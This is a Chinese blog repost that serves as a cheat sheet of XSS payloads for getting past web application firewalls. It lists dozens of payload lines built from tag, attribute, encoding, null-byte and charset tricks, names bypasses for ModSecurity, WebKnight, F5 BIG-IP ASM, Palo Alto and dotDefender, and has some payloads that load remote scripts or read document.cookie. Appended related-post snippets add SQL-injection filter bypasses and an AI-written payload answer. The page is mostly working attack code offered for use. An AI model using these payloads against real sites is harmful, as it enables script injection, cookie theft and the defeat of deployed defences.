XSS 绕过waf 姿势

最新推荐文章于 2025-04-30 17:29:41 发布
最新推荐文章于 2025-04-30 17:29:41 发布
阅读量2.2k 收藏
点赞数 2
分类专栏: web安全基础

https://www.cnblogs.com/wintrysec/p/10874980.html

 

 

1.使用无害的payload,类似<b>,<i>,<u>

观察响应,判断应用程序是否被HTML编码,是否标签被过滤,是否过滤<>等等;

2.如果过滤闭合标签,尝试无闭合标签的payload(<b,<i,<marquee)观察响应;

3.尝试以下payload

 

<script>prompt(1)</script> <script>confirm(1)</script> <script src="https://xss.haozi.me/j.js"><script>

判断是否触发过滤规则,尝试使用大小写混合字符

 

<scRiPt>alert(1)</scrIPt>

1.如果大小写不行的话,<script>被过滤尝试<scr<script>ipt>alert(1)</scr<script>ipt>

2.使用<a>标签测试

 

<a href="https://xss.haozi.me/j.js">clickme</a>

2|0测试其它标签

 

src属性

 

<img src=x οnerrοr=prompt(1);> <img/src=aaa.jpg οnerrοr=prompt(1);> <video src=x οnerrοr=prompt(1);> <audio src=x οnerrοr=prompt(1);>

iframe

 

<iframesrc="javascript:alert(2)"><iframe/src="data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

Embed

 

<embed/src=//goo.gl/nlX0P>

Action

 

<form action="Javascript:alert(1)"> <input type=submit action="javascript:alert(1)"/> <isindex type=image action="javascript:alert(1)"> <isindex type=image action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1)> /*html编码*/ <isindex action=data:text/html, type=image>

mario验证

 

<formaction=&#039;data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt&#039;><button>CLICK

formaction属性

 

<isindex formaction="javascript:alert(1)" type=image> <input type="image" formaction=JaVaScript:alert(0)> <form><button formaction=javascript&colon;alert(1)>CLICKME

“background”属性

 

<table background=javascript:alert(1)></table> // Works on Opera 10.5     and IE6

“posters” 属性

 

<video poster=javascript:alert(1)//></video> // Works Upto Opera 10.5

“data”属性

 

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">

“code”属性

 

<applet code="javascript:confirm(document.cookie);"> // Firefox Only <embed  code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>

事件处理

 

<svg/οnlοad=prompt(1);> <marquee/onstart=confirm(2)> <body οnlοad=prompt(1);> <select autofocus οnfοcus=alert(1)> <textarea autofocus οnfοcus=alert(1)> <keygen autofocus οnfοcus=alert(1)> <video><source οnerrοr="javascript:alert(1)">

短payload

 

<q/oncut=open()> <q/oncut=alert(1)> //在有效负载限制的情况下非常有用

嵌套欺骗

 

<marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)>

圆括号被过滤

 

<a οnmοuseοver="javascript:window.οnerrοr=alert;throw 1> <img src=x οnerrοr="javascript:window.οnerrοr=alert;throw 1"> <body/οnlοad=javascript:window.οnerrοr=eval;throw&#039;=alert\x281\x29&#039;;

“location”属性

 

<a οnmοuseοver=location=’javascript:alert(1)>click <body οnfοcus="location=&#039;javascrpt:alert(1)>123

其他Payload

 

<meta http-equiv="refresh" content="0;url=//goo.gl/nlX0P"> <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/> <svg xmlns="http://www.w3.org/2000/svg"><g οnlοad="javascript:\u0061lert(1);"></g></svg> <svg xmlns:xlink=" r=100 /><animate attributeName="xlink:href"     values=";javascript:alert(1)" begin="0s"     dur="0.1s" fill="freeze"/> <svg><![CDATA[><imagexlink:href="]]><img/src=xx:xοnerrοr=alert(2)//"</svg> <meta content="&NewLine; 1 &NewLine;;JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/><math><a xlink:href="//jsfiddle.net/t846h/">click

();:被过滤

 

<svg><script>alert&#40/1/&#41</script>     // Works With All Browsers     ( is html encoded to &#40 ) is html encoded to &#41

3|0基于上下文的过滤

 

WAF最大的问题是不能理解内容,使用黑名单可以阻挡独立的js脚本

但仍不能对xss提供足够的保护,如果一个反射型的XSS是下面这种形式

输入反射属性

 

<input value="XSStest" type=text>

我们可以使用 “><img src=x onerror=prompt(1);>触发

但是如果<>被过滤,我们仍然可以使用“ autofocus onfocus=alert(1)//触发

基本是使用“ 关闭value属性,再加入我们的执行脚本

 

" οnmοuseοver="prompt(0) x=" " οnfοcusin=alert(1) autofocus x=" " οnfοcusοut=alert(1) autofocus x=" " οnblur=alert(1) autofocus a="

输入反射在<script>标签内

类似这种情况:

 

<script>Var x=”Input”;</script>

通常,我们使用“></script>,闭合前面的</script>标签

然而在这种情况,我们也可以直接输入执行脚本 alert(), prompt(),confirm()

例如:“; alert(1)//

非常规事件监听

DOMfocusin,DOMfocusout,等事件,这些需要特定的事件监听适当的执行。例如:

 

";document.body.addEventListener("DOMActivate",alert(1))// ";document.body.addEventListener("DOMActivate",prompt(1))// ";document.body.addEventListener("DOMActivate",confirm(1))//

此类事件的列表

 

DOMAttrModified DOMCharacterDataModified DOMFocusIn DOMFocusOut DOMMouseScroll DOMNodeInserted DOMNodeInsertedIntoDocument DOMNodeRemoved DOMNodeRemovedFromDocument DOMSubtreeModified

超文本内容

代码中的情况如下

 

<a href=”Userinput”>Click</a>

可以使用javascript:alert(1)//直接执行<a href="javascript:alert(1)//">Click</a>

变形

主要包含大小写和JavaScript变形

 

  javascript&#058;alert(1)   javaSCRIPT&colon;alert(1)   JaVaScRipT:alert(1)   javas&Tab;cript:\u0061lert(1);   javascript:\u0061lert&#x28;1&#x29   javascript&#x3A;alert&lpar;document&period;cookie&rpar;

JSON内容

反射输入

 

  encodeURIComponent(&#039;userinput&#039;)

可以使用

 

  -alert(1)-   -prompt(1)-   -confirm(1)-

结果

 

  encodeURIComponent(&#039;&#039;-alert(1)-&#039;&#039;)   encodeURIComponent(&#039;&#039;-prompt(1)-&#039;&#039;)

输入反射在svg标签内

源码如下:

 

<svg><script>var myvar=”YourInput”;</script></svg>

可以输入

 

www.site.com/test.php?var=text”;alert(1)//

如果系统编码了”字符

 

<svg><script>var myvar="text&quot;;alert(1)//";</script></svg>

原因是引入了附加的(XML)到HTML内容里,可以使用2次编码处理

字符集BUG

字符集BUG在IE中很普遍,最早的bug是UTF-7。如果能控制字符集编码,我们可以绕过99% 的WAF过滤。

示例

 

http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=XSS

可以控制编码,提交

 

http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=”><img src=x οnerrοr=prompt(0);>

可以修改为UTF-32编码形式

 

∀㸀㰀script㸀alert(1)㰀/script㸀 http://xsst.sinaapp.com/utf-32-1.php?charset=utf-32&v=%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80

空字节

最常用来绕过mod_security防火墙,形式如下:

 

<scri%00pt>alert(1);</scri%00pt> <scri\x00pt>alert(1);</scri%00pt> <s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>

空字节只适用于PHP 5.3.8以上的版本

Unicode分隔符

[on\w+\s*]这个规则过滤了所有on事件

为了验证每个浏览器中有效的分隔符,可以使用fuzzing方法测试0×00到0xff,

结果如下:

 

  IExplorer=     [0x09,0x0B,0x0C,0x20,0x3B]   Chrome =     [0x09,0x20,0x28,0x2C,0x3B]   Safari = [0x2C,0x3B]   FireFox=     [0x09,0x20,0x28,0x2C,0x3B]   Opera = [0x09,0x20,0x2C,0x3B]   Android =     [0x09,0x20,0x28,0x2C,0x3B] ​ x0b在Mod_security中已经被过滤,绕过的方法: <a/onmouseover[\x0b]=location=&#039;\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B&#039;>rhainfosec

缺少X-frame选项

通常会认为X-frame是用来防护点击劫持的配置,其实也可以防护使用iframe引用的xss漏洞

DOM型XSS

服务器不支持过滤DOM型的XSS,因为DOM型XSS总是在客户端执行,看一个例子:

 

<script> vari=location.hash; document.write(i); </script>

在一些情况下,反射型XSS可以转换成DOM型XSS:

 

http://www.target.com/xss.php?foo=<svg/οnlοad=location=/java/.source+/script/.source+location.hash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.hash[3]//#:()

上面的POC只在[.+都被允许的情况下适用,可以使用location.hash注入任何不允许的编码

 

Location.hash[1] = : //定义在散列后的第一个位置 Location.hash[2]= ( //定义在哈希之后的第二个位置 Location.hash[3] = )   //定义在散列之后的第三个位置

如果有客户端过滤可能不适用

绕过

ModSecurity绕过

 

<scri%00pt>confirm(0);</scri%00pt><a/onmouseover[\x0b]=location=&#039;\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B&#039;>rhainfosec

WEB KNIGHT绕过

 

<isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image><marquee/onstart=confirm(2)>

F5 BIG IP ASM and Palo ALTO绕过

 

<table background="javascript:alert(1)"></table> //IE6或者低版本Opera “/><marquee  onfinish=confirm(123)>a</marquee>

Dot Defender绕过

 

<svg/οnlοad=prompt(1);><isindex action="javas&tab;cript:alert(1)" type=image><marquee/onstart=confirm(2)>

 

__EOF__

安全测试之XSS绕过姿势总结
LYX_WIN
06-15 536
xss test
常见绕过姿势小结
热门推荐
weixin_45253622的博客
04-01 1万+
一、SQL注入 假设关键词被过滤掉,我们尝试以下绕过方法。 1、大小写绕过注入 id=1 AND 1=1 、id=1 anD 1=2 #查看是否存在注入 id=1 And 1=1 、id=1 aNd 1=2 id=1 Order by 3.... 2、双写绕过注入 id=1 anandd 1=1 、 id=1 anandd 1=2 #过滤and id=1 ororderby 3 #若过滤掉or则双写or即可 3、编码绕过注入 服务器会自动对URL进行一次URL解码,所以需要把关键词编码两次。注意,UR
mysql 注入 绕过防火墙_新型渗透手法:利用XSS绕过WAF进行SQL注入
weixin_39852491的博客
02-18 332
*本文作者:风之传说,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。0×00 前言看到标题,很多人肯定会一脸懵逼,这是什么鬼。利用xss绕过waf进行sql注入?话说,没点意思的文章,我自己也不好意思写出来啊。通俗讲,就是XSS和sql注入相结合绕过waf。知识要能灵活运用嘛。做一个灵活的胖子(虽然我不是胖子)。0×01起因咳咳,还是来说下起因吧!最近遇到一个网站,有防火墙,而且极其变...
XSS漏洞介绍以及waf绕过
weixin_58052886的博客
06-27 2067
跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页面时,嵌入Web里面的 Script 代码会被执行,从而达到恶意攻击用户的目的。主要在于程序对输入和输出的控制不够严格,导致攻击者在将script代码输入后,在前端浏览器被当作有效代码解析并执行从而产生危害。
SQL注入常用绕WAF小技巧,从零基础到精通,收藏这篇就够了!
最新发布
Libra1313的博客
04-30 915
但别慌,冷静分析,找出WAF的检测机制,然后逐一击破。记住,不同场景的WAF都有着不同的检测机制,但我们的方法和逻辑思维是不变的。但说实话,就因为某些原因(你懂的,比如免费、开源嘛),防护规则总有那么点不全面,这就给黑客留下了可乘之机。很多时候,WAF的检测机制都比较死板,只会对某个单词进行统一检测过滤,要么统一小写,要么统一大写。比如,WAF认为"select"是恶意语句,但"SeLeCt"、"sElECT"、"SELEct"等等就不在黑名单里了。而且,内联注释的变化多端,让人捉摸不透,防不胜防。
绕过web防火墙
s595674548的专栏
10-25 2359
今天去面试一个渗透测试岗位,其中有一题“”绕过waf的方法“”,说实在本人虽然是信息安全专业,但是做母校专业鼻祖,真不敢恭维母校的教学质量。后来本人出来做了软件开发,可以说软件开发几乎是自学,成不成才真不好说,懂一点点皮毛,混口饭吃;后来想转到安全,去面试几家安全类岗位,好几个都以我没工作经验为由拒绝我,其实也有我能力不是很突出的问题,本人懂的东西很广,但是都不怎么深入,竟然连绕过防火墙这样的问题
【网络安全 --- XSS绕过xss绕过手法及思路你了解吗?常见及常用的绕过手法了解一下吧
m0_67844671的博客
10-18 2045
【网络安全 --- XSS绕过xss绕过手法及思路你了解吗?常见及常用的绕过手法了解一下吧;你知道xss如何绕过吗?本篇讲述了一些xss常见的绕过手法及技巧,包括双写,大小写绕过,编码绕过等,过来看看吧
渗透防火墙绕过
weixin_46626737的博客
03-13 1107
隔两三秒),还可以通过修改请求包的user-agent为百度,360等搜索引擎的信息,从而伪造成搜索引擎在爬取网页,从而不会造成拦。Ⅰ.当利用工具进行扫描时,比如扫描路径,对方开启了wafCC流量检测,则返回的结果会产生误报,可以通过延时扫描来绕过(每次扫描间。还可以利用Xray和awvs,bp联合起来,bp当中转,xray当主要扫描工具,awvs当绕过方式(降低速度,请求头爬虫引擎)②自写轮子:自己抓菜刀蚁剑的读取文件,执行命令的数据包,进行解密,然后自己进行修改,达到目的,进行在网页上的操作,
xss绕过html实体化,通过脚本片段绕过XSS防御
weixin_42386511的博客
06-07 1922
原标题:通过脚本片段绕过XSS防御 从恶作剧弹框到盲打后台乃至沦陷一个企业,XSS的危害可大可小,近年来,XSS攻击与防御的博弈持续不断,下面是今年5月份北爱尔兰首府举行的OWASP AppSec EU的安全议题:通过脚本片段绕过XSS防御。一、XSS 防御措施尽管业界付出了很多努力,XSS依然是一个广泛且未解决的问题。有数据指出:谷歌VRP中70%的漏洞是XSS漏洞。XSS防御技术的通用假设为:...
渗透测试之waf绕过基础
qi_SJQ_的博客
01-28 4123
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 思维导图 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 思维导图: 一、信息收集 此处只针对对于目标网站直接扫描的信息收集讲解,其他辅助信息收集手段如:查旁站/识别cms等手段也不会遇到waf拦截。 1.安全狗—防ddos cenos目前用的不熟练,于是我将服务器系统换成了winserver,搭建上web环境和安全狗,打开cc拦截开关,本地.
XSS漏洞学习笔记
qi_SJQ_的博客
12-31 2811
xss学习笔记
xss_waf绕过
weixin_44110913的博客
08-21 1951
写在前面: ————————————————————————————————————————————————— 当你的才华 还撑不起的野心时 那你就应该静下心来学习 ————————————————————————————————————————————————— 第一次翻译长篇文档,如有疏漏还请各位大牛指正。OWASP的这篇速查表虽然时间比较久了,但还在更新,所以还是翻译出来了。翻译完发现里...
18. XSS过滤绕过 [猥琐绕过]
→_→
05-22 652
作者:心伤的瘦子 来自:PKAV技术宅社区 网址:http://www.pkav.net ---------------------------------------------------------------------------------------------------------- 简要描述: 有些时候,通用的绕过技巧并不可行,这个时候我们就得观察缺陷点的周围环境,想想其它办法咯。“猥琐绕过”与通用绕过不同的是,它通用性小,往往只是特例。 详细说明: 1. 直接看实例点:
XSSWaf绕过及工具使用(附靶场通关记录,持续更新)
m0_51468027的博客
02-01 6250
熟悉常见的waf绕过方法和工具使用,附靶场通关记录
绕过WAFXSS语句
focus on security
02-25 2490
吐血整理转载请说明。 原文收集于OWASPXSS_Filter_Evasion_Cheat_Sheet https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet http://ha.ckers.org/xss.html 正文: XSS JavaScript injection: <SCRIPT SRC=ht...
XSS攻击绕过方法大全,XSS攻击技巧,收集100种绕过方法分享(2024最新)
白帽黑客八哥的博客
12-12 1万+
尽管许多网站实施了输入过滤措施来防止跨站脚本(XSS)攻击,但在特定条件下,经过精心编码的脚本仍有可能实施XSS注入。本文旨在为专业的安全测试人员提供一个跨站脚本漏洞的检测指南。
xsswaf的小姿势,腾讯T3团队整理
2401_84185182的博客
04-10 453
可以看见是和我们想的一样 获取svg第一行第一个id的值然后base64解码 并输出 用eval就可以执行alert的操作。是用什么操作我们用console.log看看他输出的是不是我们理解的意思 这里在payload加上。这里是将换行符进行ascii码然后再html实体化编码用此脏字符绕过对javascript检测。(img-mrxWcqmD-1712729284340)]可以看见这里直接换行是成功也是成功的同理。战项目、讲解视频,并且后续会持续更新**这里的脏字符是换行的意思。
xss绕过方法有哪些?XSS攻击绕过过滤方法技巧分享(xss绕过宝塔)
白帽子佳奇的博客
12-12 7138
XSS(跨站脚本攻击)绕过方法是一系列技巧,用来绕过目标网站的安全措施和过滤器,执行恶意的脚本。
xss跨站之waf绕过及安全修复(28)
san3144393495的博客
05-28 2059
然后访问还是正常的,这个就是特殊符号干扰方法,常见的就是#,因为#在web里面是注释的,他是通用的,特符都可以用来干扰,有一些符号就是截断或者注释的做用,代码去匹配一些关键字的时候,防止他匹配的后面或者前面的关键字,来绕过。因为xss,他的执行效果可以由多个代码实现,就是用到其他的函数,功能来替换,在跨站中想实现那种功能,也是可以应用到不同的操作语句去实现同一个目的,比如下面这串代码,取得的功能是一样的,去掉最后字符串,访问还是拦截,再去掉alert(1),访问还是拦截,再去掉尖括号里面一个字符。
xss绕过waf
03-25
<think>好的,用户想了解如何通过XSS漏洞绕过WAF防护机制。首先,我需要回忆一下相关的知识,确保信息准确。根据提供的引用内容,绕过WAF的方法主要有提交方式绕过、混淆伪装、编码转换、利用协议特性等。 用户可能对WAF的工作原理不太清楚,可能需要简单解释一下WAF如何检测恶意输入,比如基于正则表达式或规则库。然后,分点说明不同的绕过技术,每个方法都需要具体的例子,比如在提交方式绕过中,提到GET和POST的区别,或者如何在Cookie中注入。 要注意避免提供可用于实际攻击的详细代码,保持讨论在理论层面。同时,强调这些方法仅用于学习,并提醒遵守法律。可能需要检查引用内容中的例子是否正确,例如混淆伪装的例子是否有误,比如使用<img/src=1 onerror=alert(1)>这样的变体来绕过过滤。 另外,引用中的资料提到的一些方法,比如大小写混淆、标签属性分割,这些都需要具体说明。同时,注意不同WAF可能有不同的规则,所以绕过方法可能因情况而异。 最后,用户可能需要防御建议,所以需要补充如何防范这些绕过手段,比如输入验证、输出编码、CSP等。确保回答结构清晰,分点列出绕过方法和防御措施,并正确引用来源。</think>### 如何绕过WAF实现XSS攻击? #### 一、WAF的检测机制与绕过原理 WAF通常通过正则表达式匹配、关键字过滤或行为分析来拦截XSS攻击载荷。绕过核心在于**混淆恶意代码**或**利用检测逻辑漏洞**,例如: 1. **语法拆分**:如`<scr<script>ipt>`可绕过简单关键字过滤[^3] 2. **编码转换**:使用HTML实体编码、Unicode转义等,如`< → \u003c` 3. **协议混淆**:利用JavaScript伪协议`javascript:alert(1)`的变体 #### 二、具体绕过方法 1. **提交方式绕过** - 将恶意载荷从GET请求改为POST请求或HTTP头部(如Referer) - 示例:通过修改Cookie值注入`Cookie: name=<script>alert(1)</script>`[^1] 2. **标签属性混淆** ```html <img/src="x"onerror=alert(1)> <!-- 省略空格和引号 --> <svg/onload=alert`1`> <!-- 使用反引号 --> ``` 3. **编码嵌套技术** ```javascript // 多重URL编码 %253Cscript%253Ealert(1)%253C/script%253E // Base64解码注入 <iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="> ``` 4. **利用JavaScript语法特性** ```javascript // 字符串拼接 window['al'+'ert'](1) // Unicode编码 \u0061\u006c\u0065\u0072\u0074(1) ``` 5. **WAF规则库盲区利用** - 使用冷门HTML标签:`<details open ontoggle=alert(1)>` - 新浏览器API:`<audio src=1 onratechange=eval(`alert(1)`)>`[^2] #### 三、防御建议 1. **输入验证**:白名单校验数据类型(如仅允许数字) 2. **输出编码**:根据上下文使用HTML/URL/JavaScript编码 3. **CSP策略**:通过`Content-Security-Policy`限制脚本来源 4. **WAF规则优化**:使用语义分析而非单纯正则匹配
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值